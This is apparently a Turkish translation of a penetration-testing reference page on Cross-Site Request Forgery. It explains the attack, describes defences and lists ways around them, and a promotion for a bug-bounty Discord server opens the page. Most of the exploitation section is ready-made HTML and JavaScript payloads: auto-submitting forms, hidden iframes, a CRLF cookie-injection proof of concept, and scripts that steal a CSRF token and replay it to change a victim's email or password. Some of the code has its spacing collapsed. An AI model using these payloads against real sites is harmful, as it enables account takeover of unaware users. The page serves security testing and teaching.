Deneyimli hackerlar ve bug bounty avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!
Hacking İçgörüleri
Hacking'in heyecanı ve zorluklarına dalan içeriklerle etkileşimde bulunun
Gerçek Zamanlı Hack Haberleri
Hızla değişen hacking dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
Son Duyurular
Yeni başlayan bug bounty'ler ve kritik platform güncellemeleri hakkında bilgi sahibi olun
Bugün Discord üzerinden bize katılın ve en iyi hackerlarla işbirliği yapmaya başlayın!
Cross-Site Request Forgery (CSRF) Açıklaması
Cross-Site Request Forgery (CSRF), web uygulamalarında bulunan bir güvenlik açığı türüdür. Bu, saldırganların, kimlik doğrulaması yapılmış oturumları istismar ederek, habersiz kullanıcılar adına eylemler gerçekleştirmesine olanak tanır. Saldırı, bir kullanıcının, bir kurbanın platformuna giriş yaptıktan sonra kötü niyetli bir siteyi ziyaret etmesiyle gerçekleştirilir. Bu site, JavaScript çalıştırma, formları gönderme veya resimleri alma gibi yöntemlerle kurbanın hesabına istekler tetikler.
CSRF Saldırısı için Ön Koşullar
CSRF açığını istismar etmek için birkaç koşulun sağlanması gerekir:
Değerli Bir Eylemi Belirleme: Saldırgan, kullanıcının şifresini, e-posta adresini değiştirmek veya yetkileri yükseltmek gibi istismar etmeye değer bir eylem bulmalıdır.
Oturum Yönetimi: Kullanıcının oturumu yalnızca çerezler veya HTTP Temel Kimlik Doğrulama başlığı aracılığıyla yönetilmelidir, çünkü diğer başlıklar bu amaçla manipüle edilemez.
Tahmin Edilemez Parametrelerin Yokluğu: İstek, tahmin edilemez parametreler içermemelidir, çünkü bunlar saldırıyı engelleyebilir.
Hızlı Kontrol
İsteği Burp'ta yakalayabilir ve CSRF korumalarını kontrol edebilir, tarayıcıdan test etmek için Fetch olarak Kopyala seçeneğine tıklayarak isteği kontrol edebilirsiniz:
CSRF'ye Karşı Savunma
CSRF saldırılarına karşı korunmak için birkaç önlem uygulanabilir:
Kullanıcı Doğrulaması: Kullanıcının şifresini istemek veya bir captcha çözmek, kullanıcının niyetini doğrulayabilir.
Referans veya Kaynak Başlıklarını Kontrol Etme: Bu başlıkların doğrulanması, isteklerin güvenilir kaynaklardan geldiğinden emin olmaya yardımcı olabilir. Ancak, URL'lerin dikkatlice oluşturulması, kötü uygulanmış kontrolleri atlatabilir, örneğin:
http://mal.net?orig=http://example.com kullanmak (URL güvenilir URL ile bitiyor)
http://example.com.mal.net kullanmak (URL güvenilir URL ile başlıyor)
Parametre İsimlerini Değiştirme: POST veya GET isteklerindeki parametre isimlerini değiştirmek, otomatik saldırıları önlemeye yardımcı olabilir.
CSRF Tokenleri: Her oturumda benzersiz bir CSRF tokeni eklemek ve bu tokeni sonraki isteklere zorunlu kılmak, CSRF riskini önemli ölçüde azaltabilir. Tokenin etkinliği, CORS'un zorlanmasıyla artırılabilir.
Bu savunmaları anlamak ve uygulamak, web uygulamalarının güvenliğini ve bütünlüğünü korumak için kritik öneme sahiptir.
Savunma Atlatma
POST'tan GET'e
Kötüye kullanmak istediğiniz form, bir CSRF tokeni ile POST isteği göndermek üzere hazırlanmış olabilir, ancak bir GET isteğinin de geçerli olup olmadığını kontrol etmelisiniz ve GET isteği gönderdiğinizde CSRF tokeninin hala doğrulandığını kontrol etmelisiniz.
Token Eksikliği
Uygulamalar, tokenler mevcut olduğunda tokenleri doğrulamak için bir mekanizma uygulayabilir. Ancak, token yokken doğrulamanın tamamen atlanması durumunda bir güvenlik açığı ortaya çıkar. Saldırganlar, tokeni taşıyan parametreyi kaldırarak bunu istismar edebilir, sadece değerini değil. Bu, doğrulama sürecini atlatmalarına ve etkili bir Cross-Site Request Forgery (CSRF) saldırısı gerçekleştirmelerine olanak tanır.
CSRF tokeni kullanıcı oturumuna bağlı değil
Uygulamalar CSRF tokenlerini kullanıcı oturumlarına bağlamıyorsa, bu önemli bir güvenlik riski oluşturur. Bu sistemler, her tokenin başlatan oturumla bağlı olmasını sağlamak yerine, tokenleri küresel bir havuz ile doğrular.
Saldırganların bunu nasıl istismar ettiğine dair:
Kendi hesaplarıyla kimlik doğrulama yaparlar.
Küresel havuzdan geçerli bir CSRF tokeni alırlar.
Bu tokeni bir kurbana karşı CSRF saldırısında kullanırlar.
Bu güvenlik açığı, saldırganların kurban adına yetkisiz istekler yapmasına olanak tanır ve uygulamanın yetersiz token doğrulama mekanizmasını istismar eder.
Yöntem Atlatma
Eğer istek "garip" bir yöntem kullanıyorsa, yöntemaşırı yazma işlevinin çalışıp çalışmadığını kontrol edin. Örneğin, eğer PUT yöntemi kullanıyorsa, POST yöntemini kullanmayı deneyebilir ve gönderebilirsiniz: https://example.com/my/dear/api/val/num?_method=PUT
Bu, POST isteği içinde _method parametresini göndererek veya başlıkları kullanarak da çalışabilir:
X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override
Özel başlık token atlatma
Eğer istek, CSRF koruma yöntemi olarak bir token ile birlikte özel bir başlık ekliyorsa, o zaman:
Özelleştirilmiş Token ve başlık olmadan isteği test edin.
Tam aynı uzunlukta ama farklı bir token ile isteği test edin.
CSRF tokeni bir çerezle doğrulanıyor
Uygulamalar, tokeni hem bir çerezde hem de bir istek parametresinde kopyalayarak veya bir CSRF çerezi ayarlayarak ve arka uçta gönderilen tokenin çerezle eşleşip eşleşmediğini doğrulayarak CSRF koruması uygulayabilir. Uygulama, istek parametresindeki tokenin çerezdeki değerle uyumlu olup olmadığını kontrol ederek istekleri doğrular.
Ancak, bu yöntem, bir saldırganın kurbanın tarayıcısında bir CSRF çerezi ayarlamasına izin veren hatalar varsa CSRF saldırılarına karşı savunmasızdır, örneğin bir CRLF açığı. Saldırgan, çerezi ayarlayan yanıltıcı bir resmi yükleyerek bunu istismar edebilir ve ardından CSRF saldırısını başlatabilir.
Aşağıda bir saldırının nasıl yapılandırılabileceğine dair bir örnek verilmiştir:
<html><!-- CSRF Proof of Concept - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formaction="https://example.com/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="hidden"name="csrf"value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" /><inputtype="submit"value="Submit request" /></form><img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body></html>
Not edin ki eğer csrf token oturum çerezi ile ilişkiliyse bu saldırı çalışmayacaktır çünkü kurbanın oturumunu ayarlamanız gerekecek ve dolayısıyla kendinize saldırmış olacaksınız.
Content-Type değişikliği
şuna göre, ön uç isteklerini POST yöntemi kullanarak önlemek için izin verilen Content-Type değerleri şunlardır:
application/x-www-form-urlencoded
multipart/form-data
text/plain
Ancak, kullanılan Content-Type'a bağlı olarak sunucu mantığı değişebilir bu yüzden belirtilen değerleri ve application/json, text/xml, application/xml gibi diğerlerini denemelisiniz.
JSON verisini text/plain olarak gönderme örneği ( buradan):
POST isteği aracılığıyla JSON verisi göndermeye çalışırken, bir HTML formunda Content-Type: application/json kullanmak doğrudan mümkün değildir. Benzer şekilde, bu içerik türünü göndermek için XMLHttpRequest kullanmak bir ön uç isteği başlatır. Yine de, bu sınırlamayı aşmanın ve sunucunun JSON verilerini Content-Type'a bakılmaksızın işleyip işlemediğini kontrol etmenin stratejileri vardır:
Alternatif İçerik Türlerini Kullanma: Formda enctype="text/plain" ayarlayarak Content-Type: text/plain veya Content-Type: application/x-www-form-urlencoded kullanın. Bu yaklaşım, arka ucun içerik türüne bakılmaksızın veriyi kullanıp kullanmadığını test eder.
İçerik Türünü Değiştirme: Sunucunun içeriği JSON olarak tanımasını sağlarken ön uç isteğinden kaçınmak için veriyi Content-Type: text/plain; application/json ile gönderebilirsiniz. Bu, bir ön uç isteği tetiklemez ancak sunucu application/json kabul edecek şekilde yapılandırılmışsa doğru bir şekilde işlenebilir.
SWF Flash Dosyası Kullanımı: Daha az yaygın ama uygulanabilir bir yöntem, bu tür kısıtlamaları aşmak için bir SWF flash dosyası kullanmaktır. Bu tekniği daha derinlemesine anlamak için bu gönderiye başvurun.
Referrer / Origin kontrolünü aşma
Referrer başlığından kaçının
Uygulamalar, 'Referer' başlığını yalnızca mevcut olduğunda doğrulayabilir. Bir tarayıcının bu başlığı göndermesini önlemek için aşağıdaki HTML meta etiketi kullanılabilir:
<metaname="referrer"content="never">
Bu, 'Referer' başlığının hariç tutulmasını sağlar ve bazı uygulamalardaki doğrulama kontrollerinin atlanmasına neden olabilir.
Referrer'ın parametreler içinde göndereceği URL'deki sunucunun alan adını ayarlamak için şunları yapabilirsiniz:
<html><!-- Referrer policy needed to send the qury parameter in the referrer --><head><metaname="referrer"content="unsafe-url"></head><body><script>history.pushState('','','/')</script><formaction="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="submit"value="Submit request" /></form><script>// You need to set this or the domain won't appear in the query of the referer headerhistory.pushState("","","?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")document.forms[0].submit();</script></body></html>
HEAD yöntemi atlatma
Bu CTF yazısı kısmında, Oak'ın kaynak kodu bir yönlendiricinin HEAD isteklerini GET istekleri olarak yanıt gövdesi olmadan işlemek üzere ayarlandığı açıklanmaktadır - bu, Oak'a özgü olmayan yaygın bir geçici çözümdür. HEAD istekleriyle ilgilenen belirli bir işleyici yerine, bunlar basitçe GET işleyicisine verilir, ancak uygulama yanıt gövdesini kaldırır.
Bu nedenle, bir GET isteği sınırlıysa, GET isteği olarak işlenecek bir HEAD isteği gönderebilirsiniz.
Sömürü Örnekleri
CSRF Token'ı Sızdırma
Eğer bir CSRF token'ısavunma olarak kullanılıyorsa, bir XSS açığını veya bir Dangling Markup açığını istismar ederek sızdırmayı deneyebilirsiniz.
HTML etiketleri kullanarak GET
<imgsrc="http://google.es?param=VALUE"style="display:none" /><h1>404 - Page not found</h1>The URL you are requesting is no longer available
Diğer HTML5 etiketleri, otomatik olarak bir GET isteği göndermek için kullanılabilir:
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formmethod="GET"action="https://victim.net/email/change-email"><inputtype="hidden"name="email"value="some@email.com" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Form POST isteği
<html><body><script>history.pushState('','','/')</script><formmethod="POST"action="https://victim.net/email/change-email"id="csrfform"><input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<inputtype="submit"value="Submit request" /><imgsrc=xonerror="csrfform.submit();" /> <!-- Way 2 to autosubmit --></form><script>document.forms[0].submit(); //Way 3 to autosubmit</script></body></html>
Form POST isteği iframe aracılığıyla
<!--The request is sent through the iframe withuot reloading the page--><html><body><iframestyle="display:none"name="csrfframe"></iframe><formmethod="POST"action="/change-email"id="csrfform"target="csrfframe"><inputtype="hidden"name="email"value="some@email.com"autofocusonfocus="csrfform.submit();" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Ajax POST isteği
<script>var xh;if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safarixh=newXMLHttpRequest();}else{// code for IE6, IE5xh=newActiveXObject("Microsoft.XMLHTTP");}xh.withCredentials =true;xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");</script><script>//JQuery version$.ajax({type:"POST",url:"https://google.com",data:"param=value¶m2=value2"})</script>
<--! expl.html --><bodyonload="envia()"><formmethod="POST"id="formulario"action="http://aplicacion.example.com/cambia_pwd.php"><inputtype="text"id="pwd"name="pwd"value="otra nueva"></form><body><script>functionenvia(){document.getElementById("formulario").submit();}</script><!-- public.html --><iframesrc="2-1.html"style="position:absolute;top:-5000"></iframe><h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
CSRF Token'ı çal ve bir POST isteği gönder
functionsubmitFormWithTokenJS(token) {var xhr =newXMLHttpRequest();xhr.open("POST",POST_URL,true);xhr.withCredentials =true;// Send the proper header information along with the requestxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");// This is for debugging and can be removedxhr.onreadystatechange=function() {if(xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {//console.log(xhr.responseText);}}xhr.send("token="+ token +"&otherparama=heyyyy");}functiongetTokenJS() {var xhr =newXMLHttpRequest();// This tels it to return it as a HTML documentxhr.responseType ="document";xhr.withCredentials =true;// true on the end of here makes the call asynchronousxhr.open("GET",GET_URL,true);xhr.onload=function (e) {if (xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {// Get the document from the responsepage =xhr.response// Get the input elementinput =page.getElementById("token");// Show the token//console.log("The token is: " + input.value);// Use the token to submit the formsubmitFormWithTokenJS(input.value);}};// Make the requestxhr.send(null);}varGET_URL="http://google.com?param=VALUE"varPOST_URL="http://google.com?param=VALUE"getTokenJS();
CSRF Token'ı çal ve bir iframe, bir form ve Ajax kullanarak bir Post isteği gönder
Kod, bir CSRF token kullanarak bir giriş formunu Kaba Kuvvet ile kırmak için kullanılabilir (Ayrıca, olası bir IP kara listesini aşmaya çalışmak için X-Forwarded-For başlığını da kullanıyor):
